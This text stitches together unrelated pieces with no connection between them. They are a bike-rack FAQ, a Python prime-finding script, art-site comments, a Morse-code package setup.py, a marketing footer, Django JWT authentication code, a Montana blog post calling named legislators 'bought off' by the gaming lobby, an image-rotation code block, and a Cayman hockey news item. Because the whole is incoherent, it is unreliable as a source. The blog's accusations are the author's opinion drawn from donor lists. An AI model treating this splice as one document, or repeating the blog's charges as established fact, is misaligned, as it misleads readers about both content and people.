No – our racks won’t work with a rear wheel because of the derailleur and gears. One of the main features of our bike racks is the way you roll your bike in and out; there’s no lifting of the bike. It’s very easy to balance the bike on the rear wheel and push it forward until the front tyre engages with the rack. This would be difficult to do with the rear tyre in the rack and it wouldn’t sit well in the rack with the derailleur.
Which rack do I need for my bike?
To find the best suited rack for your bike, you will need to measure your wheel diameter and tyre width. You can learn more about these measurements here. Tyre widths more than 2.4 inches will need a Fat Rack.
My tyre width is 2.4 inches. Will I need a Classic Rack or Fat Rack?
Make sure you’ve triple checked this measurement. 2.4 inch wide tyres can fit into our Classic and Fender Racks, however they will be a snug fit. You can choose our Fat Racks for this tyre width, however the wheel will not fit as snug. If you are unsure about which rack you should purchase, please feel free to contact our team.
Does the Fat Rack come with a different rear wheel support bracket/rest?
The rear wheel support bracket for the Fat Rack is the same size as those used for the Classic Rack and the Fender Racks. You may find that it won’t cradle your rear wheel entirely, however but it will stabilise it and stop it from sliding out when pivoted as it’s designed to do.
What is the minimum wheel diameter that will fit in a Steadyrack?
Our bike racks are suitable for bikes with wheel diameters between 20 and 29 inches. This is to ensure that the bike fits in the Steadyrack arms snugly, and safely. You can check your tyre size against our product information on this page.
What is the maximum tyre width that will fit in a Steadyrack?
The Classic and Fat Racks will accommodate tyres up to 2.4 inches wide and the Fat Rack will accommodate tyres up to 5 inches wide.
How far will my bike stick out from the wall when pivoted against the wall?
It really depends on the width of your handlebars, saddle height and pedals. It will fold until the handlebars touch the wall, however not quite 90 degrees or flat to the wall. For a normal road bike bar we would generally allow about 90cm or around 18 inches and a MTB with wider bars around 100cm or 20 inches from the wall.
How do your bike racks avoid damaging carbon wheels?
One of the main features of our bike rack design is the fact that it is the most suitable rack for carbon wheels. There is less pressure on the bike when it is the rack than when riding it and the Steadyrack won’t damage your wheels like hooks can. The wheel is cradled between the two V shaped cradling points created when the arms are folded down and the tyre cushions the wheel and bike. There should be absolutely no need to do any maintenance on your rims or wheels if you use a Steadyrack.
What comes with the Steadyrack bike rack?
1 plastic rear wheel rest/bracket which should be fixed to the wall in line with your rear wheel axle (see our installation instructions and videos for more information).
4 bolts and plugs for installing the rack.
2 smaller screws and plugs for the rear tyre rest/bracket.
There are 4 mounting holes on each mounting plate. You should only use two of these holes to fix your rack to the wall or frame. The two vertical aligned holes are for fixing to studs and the two horizontal aligned holes are for fixing into masonry.
How close together can I install my racks to each other?
The distance apart is very dependent on your individual situation. The racks can be spaced closer together by staggering the height of each rack to ensure the bikes’ handlebars and pedals do not clash. Alternatively, you can space them farther apart and utilise the pivot action to allow the bikes to move closer to the wall. You can learn more about spacing your racks with our Spacing Guide found on our Manuals page. We strongly recommend measuring your bikes first and then using our manuals as a guide.
What height can I mount my racks at?
The perfect mounting height is achieved when a bike is hanging in the rack and the rear wheel is close to the floor, but not touching. This ensures the least amount of rise to load the bike. Bikes will come in different lengths and therefore different mounting heights which is why we suggest measuring your bikes first by following our installation guide.
What type of walls can the racks be mounted to?
Our racks can be installed on almost all types of walls, including masonry, timber or steel framed, brick, or concrete. For timber framed or steel walls you must locate the framing first and check with your local hardware supplier for advice on the correct type of fixings for your wall type. For more installation information, please read our installation guides.
What if my studs aren’t where I want to put my racks?
No problem – you can fix rails across the studs at your preferred mounting height and then space your racks along the rails. Another option is to fix a sheet of 10mm ply across the top of your wall lining or studs and then screw your racks to the ply in the exact location you want them.
Will I need to buy fixings for my bike rack?
We provide fixings suitable for installing your Steadyrack bike racks onto timber and masonry. Should you need to install your rack onto a different surface (e.g. steel) then we recommend visiting your local hardware store for advice on suitable fixings.
Do I need to install the rear wheel bracket/rest?
Although we recommend installing the rear wheel bracket/rest with your Steadyrack bike rack, if circumstances restrict you from installing it, the rack will still perform as required. You may find that your rear wheel might move more than usual without the rest however it’s not vital that this be installed.
What size masonry drill bit do I need for installing into brick?
You will need a 10mm drill piece for the Steadyrack bike rack and 6.5mm for the bottom bracket.
How do you mount a Steadyrack using the fixings provided?
The Steadyrack bike rack kit comes with 4 bolts and plugs for installing the rack and 2 smaller screws and plugs for the rear tyre rest/bracket. There are 4 mounting holes on each mounting plate. Use 2 of these holes only to fix your rack to the wall or frame. The two vertical aligned holes are for fixing to studs and the two horizontal aligned holes are for fixing into masonry.
Do I have to use all 4 fixing bolts provided?
Yes – we recommend that you use all 4 fixing bolts provided.
Can I install my Steadyrack bike racks outside?
Yes – you can hang your Steadyrack bike racks outside, however it’s not covered by our warranty.
Shipping times and deliveries vary depending on your country, region and location. Your estimated shipping delivery time will show at the checkout, however please keep in mind that these may not take into account courier operating days, public holidays and other delivery parameters. Once you have placed your order online, it can take from 1 – 2 business days to process your order.
A full list of our shipping countries and regions can be found here. If your country or region is not listed, please email our team at [email protected] to see how we can arrange sending our racks to your location.
We work hard to ensure that our Steadyrack bike racks are manufactured to the highest standard. However, if you find a fault or you are dissatisfied with your Steadyrack for any reason, please contact us at [email protected] so we can assist you further.
Is there a Warranty on the Steadyrack?
Yes – you can view our warranty information here.
Where can I buy Steadyrack in stores?
The easiest and most convenient way to order our bike racks is through our online store. Some retailers and dealers across the globe stock our bike racks, however we cannot confirm the what their stock levels might be.
Yes – we do have a wide range of distributors. If you are interested in becoming a distributor for our Steadyrack bike racks, please visit this page.
Are Steadyrack bike racks safe to use for bikes with hydraulic brakes/forks/suspension?
Yes! This a common concern for many bike owners with these types of brakes and suspension. When your bike is hung up vertically, the fluid in your forks will run towards the seals and keep them lubricated. This will prolong their use, so it’s actually good for your bike and forks to hang it vertically on our bike racks. If you have hydraulic brakes on your bike, the fluid will run down when the bike is hung, so we advise pumping the brakes a few times when you take the bike off the rack if it’s been there for a while. The shocks shouldn’t leak when the bike is hung up, however if they do then it’s a good indication that the seals might need replacing.
Are your bike racks safe to use for aero/time-trial bikes?
Yes – however you will most likely need a Fender Rack. If you have an aero bike you will need to measure the gap between the down tube and tyre (you can see this measurement here). For most bike this will be more than 10mm, however if your distance is less than this, you will need a Fender Rack. This is because the rubber end on the Fender Rack can easily fit between your tyre and down tube and won’t damage your frame if it comes in contact with it.
What options exist for locking my bike onto your racks?
Your bikes can be locked through their frame and the 2 arms of our Steadyrack bike racks using either a D Lock or cable lock – this will depend on the type of bike you have. Remember that it’s always better to keep your bikes out of a visible location to avoid theft even if your bike is locked.
What bike storage solutions do you have for a commercial bike parking facility or project?
We have a wide variety of options for bike parking projects and end of trip facilities. For all enquiries of this kind, please contact our team.. |
def listprime(lp):
prime=[True]*lp
prime[0]=False
prime[1]=False
for x in range(lp):
if prime[x]:
bei=x+x
while bei<lp:
prime[bei]=False
bei+=x
return prime
def replaceStar(s):
result=[]
if '*' in s:
for n in range(0,9+1):
news = s.replace('*', str(n))
if news[0]!='0':
result.append(news)
else:
result.append(s)
return result
primes=listprime(10000000)
def countPrime(list):
result=[]
for s in list:
if primes[int(s)]:
result.append(s)
return result
# print countPrime(replaceStar('56**3'))
# print countPrime(replaceStar('*3'))
def generate(g):
if g==0:
yield ''
return
for other in generate(g-1):
for first in '1234567890*':
yield first+other
for x in generate(6):
if len(countPrime(replaceStar(x)))==8:
print countPrime(replaceStar(x))
|
Sorry for the poor quality, but I thought it'd be okay as a reference.
I used your wonderful stock here: [link] Thanks so much!
I just LOVE all of your work on this little foal!
you may have to sign up (sorry!) but its the only way i could show you!
I adore this pose! I think the quality of the image is wonderful. Great work! |
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
long_description = """sweetmorse
----------
Morse code tools from read to write, analog to digital.
.. image:: https://www.travis-ci.org/Jdsleppy/sweetmorse.svg?branch=master
:target: https://www.travis-ci.org/Jdsleppy/sweetmorse
Compatibility
-------------
Targets Python3, tested against against Python 3.3-3.6.
More info
---------
See a crash course at https://github.com/Jdsleppy/sweetmorse
"""
setup(
name='sweetmorse',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.1.0',
description='Morse code tools from read to write, analog to digital',
long_description=long_description,
url='https://github.com/Jdsleppy/sweetmorse',
author='Joel Sleppy',
author_email='[email protected]',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Communications :: Ham Radio',
'Topic :: Multimedia :: Sound/Audio',
# (should match "license" above)
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='morse signal electronics',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
python_requires='~=3.0',
package_data={},
data_files=[],
entry_points={
'console_scripts': [
'sweetmorse = sweetmorse.main:main',
],
},
)
|
Ready to take your Email Marketing to the next level so you can book and retain more clients from your inbox?
Success! Now check your email to access your free content!
Copyright © 2019 | Remedy Writing | Margo Carroll | All rights reserved. |
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from rest_framework import authentication
from rest_framework.exceptions import AuthenticationFailed
from jwt.exceptions import TokenException
from jwt import BaseToken, compare, token_factory
from auth.models import UserProfile
from authtoken.settings import api_settings, secret_key
def get_token_instance(user_profile):
return token_factory(
api_settings.TOKEN_HEADER_CLAIMSET_CLASS,
api_settings.TOKEN_PAYLOAD_CLAIMSET_CLASS,
{
'payload': {'aud': api_settings.TOKEN_AUDIENCE or user_profile.id}
}
)
def validate_user(user):
"""Validates a user is active and can be used to authenticate.
"""
# From Django 1.10 onwards the `authenticate` call simply
# returns `None` for is_active=False users.
# (Assuming the default `ModelBackend` authentication backend.)
if not user.is_active:
raise ValidationError('User account is disabled.')
def authenticate_credentials(kwargs):
"""
Returns a UserProfile object from the given kwargs if the UserProfile object
exists and is valid. AuthTokenSerializer validates UserProfile object.
"""
try:
user_profile = UserProfile.objects.get(**kwargs)
except UserProfile.DoesNotExist:
raise AuthenticationFailed('User non existant')
try:
validate_user(user_profile.user)
except ValidationError as exc:
raise AuthenticationFailed(_(str(exc)))
return user_profile
class JSONWebTokenAuthentication(authentication.BaseAuthentication):
"""
JSON Web Token based authentication conforming to RFC 7519.
See https://jwt.io/introduction/ and https://openid.net/specs/draft-jones-json-web-token-07.html
for more about JWTs.
Clients should authenticate by passing the JWT token key in the "Authorization"
HTTP header, prepended with the string "Bearer ".
For example:
Authorization: Bearer eyJhbGciO.eyJzdWIiOiIxMjM0NTY3ODkwIiwib.TJVA95OrM7E2cBab3
"""
keyword = 'Bearer'
www_authenticate_realm = 'api'
def authenticate(self, request):
"""
Authenticate the request if the signature is valid and return a two-tuple of (user, token).
"""
auth = authentication.get_authorization_header(request).split()
if not auth or auth[0].lower() != self.keyword.lower().encode():
return None
token = self.validate_bearer(auth)
try:
# TODO Remove this, and don't verify audience as it is not
# verified yet.
user_profile = self.get_token_user(request, token)
if user_profile is not None:
token_instance = get_token_instance(user_profile)
# Verify token
if compare(token, token_instance, secret_key(),
api_settings.TOKEN_VERIFICATION_ALGORITHM_INSTANCE):
return (user_profile.user, token)
except AuthenticationFailed as exc:
raise AuthenticationFailed(_(str(exc) or 'Provided credentials invalid.'))
except TokenException as exc:
raise AuthenticationFailed(_(str(exc)))
def get_token_user(self, request, token):
"""Gets the user specified in the request headers or, more commmonly,
in the token payload itself.
"""
# Get username or user id in request headers
username = request.META.get('X_USERNAME')
user_id = request.META.get('HTTP_USER_ID') # ex. USER-ID: 100
payload = BaseToken.clean(token)[1]
user_profile = None
# Get user from username, user_id, or from token payload.
if username:
user_profile = authenticate_credentials({'user__username': username})
elif user_id:
user_profile = authenticate_credentials({'id': user_id})
elif payload.get('aud'):
user_profile = authenticate_credentials({'id': payload.get('aud')})
return user_profile
def validate_bearer(self, bearer):
"""Ensure the token passed through request headers is valid and is parsable.
If the token is not valid or not parsable, `AuthenticationFailed` is raised.
"""
if len(bearer) == 1:
msg = _('Invalid token header. No credentials provided.')
raise AuthenticationFailed(msg)
elif len(bearer) > 2:
msg = _('Invalid token header. Token string should not contain spaces.')
raise AuthenticationFailed(msg)
try:
token = bearer[1]
except UnicodeError:
msg = _('Invalid token header. Token string should not contain invalid characters.')
raise AuthenticationFailed(msg)
return token
def authenticate_header(self, request):
"""Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(self.keyword, self.www_authenticate_realm)
|
Whose Pocket is Montana’s Legislative Leadership Team In?
How the system works is that individuals and political committees donate to candidates.
When those candidates win and take office and head to Helena for the legislature, those individuals and committees become lobbyists.
Oh, they don’t do it themselves – don’t be silly!
No, they pay other people to lobby for them. You can spot these lobbyists a mile away – shiny shoes and fancy suits and smelling like they spilled the bottle of cologne all over themselves. And God…those smiles.
So we have rather nefarious people buying-off candidates with political contributions (legalized bribes) before they get elected, and then buying them off with lobbyists after they take office.
This is how our system works.
My goal today was to dig into the finance reports of the 20 members of the 150-member 2019 Legislature to see which individuals and committees bought them off before they were elected, with the goal of ascertaining whose interests those ‘leaders’ will be working toward over the next four months of chaos in Helena.
I have to admit, I went in with an agenda.
I wanted to see how many candidates took money from healthcare-related groups…candidates who – once elected – would be voting to either continue or end Medicaid expansion in Montana, something we typically refer to as Obamacare.
My agenda was dashed quickly, as it became quite apparent that healthcare wasn’t the industry most interested in swaying the legislature.
So let’s get into the candidates so you can see for yourself, and then I’ll give you a short conclusion based on history.
Let’s start with the leadership of the Montana Senate.
Scott Sales is the GOP president of the Montana Senate, and in a way, one of the top dogs of the whole 2019 Legislature.
He took money from Charter, Northwestern Energy, BP North America, the Association of Montana Troopers, the Montana Land Surveyor’s PAC, Montana Wood Products Association, Motorola, MDU Resources (an infrastructure group), and BackPAC (a group that mostly gives to congressional democrats).
Other groups include Health Care Services Corporation Employees’ PAC, Montana Independent Bankers, and Weyerhaeuser…which bought Plum Creek Timber in 2016 for $8.4 billion. That means the company took control of the 6 million acres Plum Creek had, including the 770,000 acres here in Montana. Weyerhaeuser now owns over 12 million acres of timberland in the US, making it a huge business, and political lobby.
When it comes to individuals that are donating to him, we’re really interested in what business they’re in. For instance, we see that the president of Century Gaming based out of Billings is donating to him.
As a quick aside…Elsie Arntzen’s husband, Steve Arntzen, is the president and CEO of Century Gaming. Elsie ran for and won the OPI spot in 2016, and I find the fact that Elsie’s husband donated $230 to the now-president of the Montana Senate – and the fact that he in turn donated $790 to Elsie in August 2016 – to be quite questionable ethically.
Other gaming interests that gave Sales money include route operators for Golden Gaming as well as Rocky Mountain Gaming. Besides that we see lots of attorney’s giving to this man, as well as an executive from Chevron and the vice president of Plum Creek. Clearly, he’s in the gaming lobby’s pocket most of all, though, though timber is coming very close.
Here are some other members of the legislative leadership team.
Mark Blasdel: This guy has finance reports dating back to 2008, but for the 2018 report what stood out to me where the number of individuals associated/employed by the gaming industry. We have Century Gaming & Technology, Diamond Jim’s owners, Dotty’s Casino owners, Nickel’s Casino route operators, Town Pump route operators and many more. Clearly, Blasdel is in the gambling lobby’s pocket.
Fred Thomas: The architect of Montana deregulation has reports going back to the year 2000. We’ll focus on his 2016 reports. Mostly, Thomas is getting his money from ranchers and retired people. He also gets a lot from the gaming industry, including the Gaming Industry Association. Another is from Montanans for Affordable Housing. Thomas will likely vote against Medicaid expansion, but he has taken a lot from nursing industry workers, doctors, medical consultants as well as Consumer Direct Care Network…a group that represents over 27,000 care workers. This guy’s in both the gaming industry’s pocket, as well as the medical lobby’s pocket.
Cary Smith: This guy has reports going back to 2008, but we’ll focus on 2018’s. Lots of gaming business owners gave him money. Big committees giving him money include Charter, Ash Grove Cement, Montana Action Committee for Rural Electrification, Conoco Philips, CVS Health, and a property insurance group. The CEO of the Montana Medical Association gave him money. This man is in the rural infrastructure lobby’s pocket.
Steve Fitzpatrick: We have to go back to 2016 to get reports for this guy, and we see that lots of gaming industry folks gave him money, as well as the vice president of Blue Cross Blue Shield and the CEO of Benefis, as well as that company’s vice president and COO. Both an attorney and the chief of staff of the Montana Department of Justice gave him money. Leaning toward the medical lobby’s pocket.
Jon Sesso: Now we’ll get to the democrats, and this man has reports going back to 2006. His latest is from 2016. He took from GlaxoSmith Kline, Weyerhaeuser, BNSF, Charter, Motorola, Phillips 66, route operators for Golden Gaming and Rocky Mountain Gaming, as well as the CEO of Golden Gaming and that company’s manager. Mostly, this dem is in the gaming lobby’s pocket.
Jennifer Pomnichowski: This woman has reports going back to 2010, but we’ll focus on 2018. She took from Charter, Trout Unlimited, the VP of Distributed Gaming for Golden Entertainment, and that company’s CEO. This woman is in the gaming lobby’s pocket.
Margie MacDonald: This woman has reports going back to 2012, but we’ll focus on 2016. She took from Carol’s List, Charter, attorneys, and lots of people that don’t have job. Employees for Zinc Air, Inc. were big contributors. The governor even contributed. Honestly, the amount of “not employed” I see listed in her reports is alarming, and I’m not able to pinhole which industry bought her off.
Let’s switch gears and look at the leadership of the Montana House.
Greg Hertz: This guy has reports going back to 2012, but we’ll focus on 2018. The owners of Town Pump gave him a lot across multiple finance reports. He took from the executive director of the Gaming Industries Association of Montana and the CEO of Century Gaming, as well as that company’s CFO. Optometrists gave him a lot. Golden Gaming is another big contributor. Clearly, this man’s in the gaming lobby’s pocket.
Wylie Galt: This Republican took from the BCBS Health Care Service Corp. Employees PAC, the Montana Beer and Wine Distributors Association, the Wood Products Association, and Weyerhaeuser. I’d put him in the timber lobby’s pocket.
Brad Tschida: This Republican took from Northwestern Energy, bankers, insurance folks, and storage business owners. Doctors gave him a lot, as did retired folks and business owners. Greg Gianforte kicked some money his way, as did a Las Vegas gaming business person. I’m not able to pigeonhole which industry pocket he’s in.
Becky Beard: This Republican took from Northwestern Energy and Weyerhaeuser. She got cash from the director of the Montana Tavern Association twice and the directors of Town Pump several times. The executive director of the Gaming Industry Association of Montana donated. Conoco Philips, CVS Health, and Montanans for Affordable Housing PAC all gave her money. The CEO of Century Gaming donated, as did the managing director of Grand Vision Gaming. This woman is clearly in the gaming lobby’s pocket.
Dennis Lenz: This guy has reports going back to 2010, but we’ll focus on 2018. Northwestern Energy gave him money, as did Greg Gianforte and a couple of optometrists. Besides that, workers from Rocky Mountain Gaming, Golden Entertainment and Golden Gaming all gave him money. He’s in the gaming lobby’s pocket.
Derek Skees: This guy took money from Century Link, consultants, retired people, Greg Gianforte, and the owner of Golden Entertainment in Las Vegas. To me, he’s rather clean…but he is still taking gaming money so I’ll also put him in the gaming lobby’s pocket.
Seth Berglee: He takes money from the Montana Beer & Wine Distributors Association, the Blue Cross Blue Shield of Montana PAC, Charter, Century Link, Weyerhaeuser, lots of retired people, Tim Fox, and fellow legislative leadership team members, Greg Hertz and Brad Tschida, as well as Theresa Manzella. I’d put this guy in the telecom’s pocket.
Casey Schreiner: This democrat took money from Magellan Health Services Employee Committee, Northwestern Energy, Steve Arntzen of Century Gaming, the managing director of Grand Vision Gaming, and the CEO of Century Gaming. He took from lots of retired people, as well as teachers, lots of tavern owners, as well as the owner of Nickel’s Casino and Town Pump and the head of the gaming industry association. He also took money from fellow leadership team members, Kim Abbott and Shane Morigeau. This guy is in the gaming lobby’s pocket.
Shane Morigeau: This Democrat took from the Montana Troopers PAC, Northwestern Energy, Weyerhaeuser, Charter, the owner of Town Pump, lots of attorneys, the president of Century Gaming, the manager of Grand Vision Gaming, the general manager of Century Gaming, and fellow leadership team member Casey Schreiner. I’d have to put this guy in the gaming lobby’s pocket.
Kim Abbott: She took from the Montana Trooper PAC, a couple of Missoula PACs, and the owner of Golden Gaming and Entertainment. She’s pretty clean.
Denise Hayman: This person didn’t raise or spend any money that I can see.
Laurie Bishop: This woman took from Carol’s List, some Missoula PACs, MT Med PAC, retired people, and the owner of Golden Gaming Entertainment in Las Vegas. For the most part, this woman is pretty clean.
Of the 20 members of the 2019 legislative leadership team, 11 of them are beholden to the gaming lobby.
Is that good, and if so…for whom (and why)?
I have to say…all of this talk of gaming in Montana got me thinking about our representative in Washington from 1961 to 1971, Arnold Olsen.
He was born in Butte during the Great War and worked in the machine shops and compressor plants of the Butte mines while taking breaks from law school in Missoula. He served in the Navy during WWII and got elected as Montana’s attorney general in 1948. At 33, he was the youngest AG in the country.
And boy, did he hate gambling!
He decried it, calling gambling operators “leeches living off the working man.” He didn’t just speak out, he took action. “He outlawed slot machines, accusing owners of escaping responsibilities as taxpayers while raking in $22 million annually.” Olsen argued that by getting rid of the slot machines the money was going to stay in Montana’s economy, not go out of state to wherever the “leeches” were from.
Because of his judiciousness in going after gambling, the 1951 Legislature didn’t appropriate any money to his office to “continue the anti-vice work.” Still, a reelection in 1952 proved he had the support of Montanans.
Olsen ran for governor and lost, but then got himself elected to a decade in Congress before fading from Montanans’ minds entirely. No one today remembers him.
Few know anything about gambling, either, or the money it brings in.
In 2015, the 16,000 video gambling machines in Montana produced $398 million in revenue for their owners, or about $24,000 a machine.
This in turn brought in $60 million to the state’s general fund via taxes (the tax rate is 15%).
Live bingo and keno don’t even come close, generating just $7,000 in taxes per year based on the 1% tax they experience.
So we’re bringing in at least $60 million a year in taxes from this, and legislators want that money, and gaming industry folks don’t want to pay anymore than that.
And it’s a lot more than it used to be. Back in 1994 the state saw $31 million in taxes for it and various counties come from the $505 million that gambling generated in the state ($444 million from video machines alone).
For over two decades now, the gaming industry has managed to lobby the legislature to keep their taxes low.
Is this good for Montanans?
Despite this revenue, many Montanans develop gambling problems, even addictions. It was estimated that “8,000 to 16,000 Montana residents have been problem gamblers at some point in their life,” according to a 1992 report.
What’s more, “another 3,500 to 11,500 Montanans may have been pathological gamblers.” The studies also revealed that the “percentage of female problem and pathological gamblers” was higher than any of the other states in the 8-state study.
No wonder why Olsen called ‘em leeches. They don’t get a lot of attention, either. It’s not like kicking an old person out of their nursing home. No, gambling works a slower kind of rot on individuals and families, a level of decay that can take years or decades to fully manifest itself.
To our legislative ‘leadership’ team, however, gambling and those who push it are a good source of income…both for the state and for their campaigns.
The gaming industry has the legislature in its pocket more than any other industry.
Is this good for Montana?
Well done. I'm glad you're back in your blogging chair.
I got a couple emails saying about the same, thanks! |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges ([email protected]), Clovis Peruchi Scotti ([email protected]),
# Guilherme Augusto Rutzen ([email protected]), Mathias Erdtmann ([email protected]) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti ([email protected]), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/rotate.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'isAtCenter',
'isAtPoint',
'isScalling',
'isFilling',
'xC',
'yC',
'BackgroundColor',
'BorderColor',
'HelpView',
'prop_confirm'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "xC":
self.widgets['xC'].set_value(float(Property.value));
if Property.name == "yC":
self.widgets['yC'].set_value(float(Property.value));
if Property.name == "isFilling":
if Property.value == "true":
self.widgets['isFilling'].set_active(True);
else:
self.widgets['isFilling'].set_active(False);
if Property.name == "isScalling":
if Property.value == "true":
self.widgets['isScalling'].set_active(True);
else:
self.widgets['isScalling'].set_active(False);
if Property.name == "isCenter":
if Property.value == "true":
self.widgets['isAtCenter'].set_active(True);
else:
self.widgets['isAtPoint'].set_active(True);
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/rotate" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#------------------------Help Text----------------------------------------------
def getHelp(self):#adicionado help
return "Detecta formas circulares na imagem de entrada.\
Saida 1 é a resposta da avaliacao(*) e a saida dois mostra os circulos encontrados."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
self.widgets['prop_confirm'].grab_focus()
for Property in self.block_properties:
if Property.name == "xC":
Property.value = unicode(self.widgets['xC'].get_value())
if Property.name == "yC":
Property.value = unicode(self.widgets['yC'].get_value())
if Property.name == "isCenter":
if self.widgets['isAtCenter'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isFilling":
if self.widgets['isFilling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isScalling":
if self.widgets['isScalling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
blockTemplate.header += "#define PI 3.1415926535898\n"
blockTemplate.header += "double rads(double degs){\n"
blockTemplate.header += " return (PI/180 * degs);\n"
blockTemplate.header += "}\n\n"
for propIter in blockTemplate.properties:
if propIter[0] == 'xC':
xC = propIter[1]
elif propIter[0] == 'yC':
yC = propIter[1]
elif propIter[0] == 'isFilling':
isFilling = propIter[1]
elif propIter[0] == 'isCenter':
isCenter = propIter[1]
elif propIter[0] == 'isScalling':
isScalling = propIter[1]
blockTemplate.imagesIO = '\nIplImage * block$$_img_i1 = NULL;\n' + \
'double block$$_double_i2;\n' + \
'IplImage * block$$_img_o1 = NULL;\n'
blockTemplate.imagesIO += '\n\n'
blockTemplate.functionCall = '\n if(block$$_img_i1)\n {\n' + \
' double scale;\n int H;\n int W;\n' + \
' W = block$$_img_i1->width;\n' + \
' H = block$$_img_i1->height;\n' + \
' block$$_img_o1 = cvCreateImage(cvSize(W,H),block$$_img_i1->depth,block$$_img_i1->nChannels);\n' + \
' CvMat* mat = cvCreateMat(2,3,CV_32FC1);\n'
if isCenter == "true":
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(W/2, H/2);\n'
else:
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(' + str(int(float(xC))) + ',' + str(
int(float(yC))) + ');\n'
if isScalling == "true":
blockTemplate.functionCall += ' scale = H/(fabs(H*sin(rads(90-abs(block$$_double_i2)))) + fabs(W*sin(rads(abs(block$$_double_i2)))));\n' + \
' cv2DRotationMatrix(center,block$$_double_i2,scale,mat);\n'
else:
blockTemplate.functionCall += ' cv2DRotationMatrix(center,block$$_double_i2,1.0,mat);\n'
if isFilling == "true":
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,CV_WARP_FILL_OUTLIERS,cvScalarAll(0));\n'
else:
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,0,cvScalarAll(0));\n'
blockTemplate.functionCall += ' }\n'
blockTemplate.dealloc = 'cvReleaseImage(&block$$_img_o1);\n' + \
'cvReleaseImage(&block$$_img_i1);\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Rotate Image"),
"Path": {"Python": "rotate",
"Glade": "glade/rotate.ui",
"Xml": "xml/rotate.xml"},
"Icon": "images/rotate.png",
"Color": "90:5:10:150",
"InTypes": {0: "HRP_IMAGE", 1: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_IMAGE"},
"Description": _("Rotates input image the input angle degrees. (More options inside)"),
"TreeGroup": _("Experimental")
}
|
Brad Galbraith is a multi-sport athlete in the Cayman Islands. He has a background in football, recently finished a youth basketball season and is now sharpening his skates for his first love: hockey.
In particular Galbraith, who turns 18 this month, is guiding a roller hockey team on Grand Cayman. The Ottawa native is team captain of the Legendz Longhorns in the Logic Adult Roller Hockey League. The competition started earlier this month and sees matches every Tuesday evening at the Logic arena of Kings Sports Centre.
Galbraith’s Longhorns are in action tonight at 9pm. The Longhorns may be a new name in local hockey but are essentially the same Barracudas squad from last year. In spite of his age Galbraith is no stranger to the sport having played the last four years.
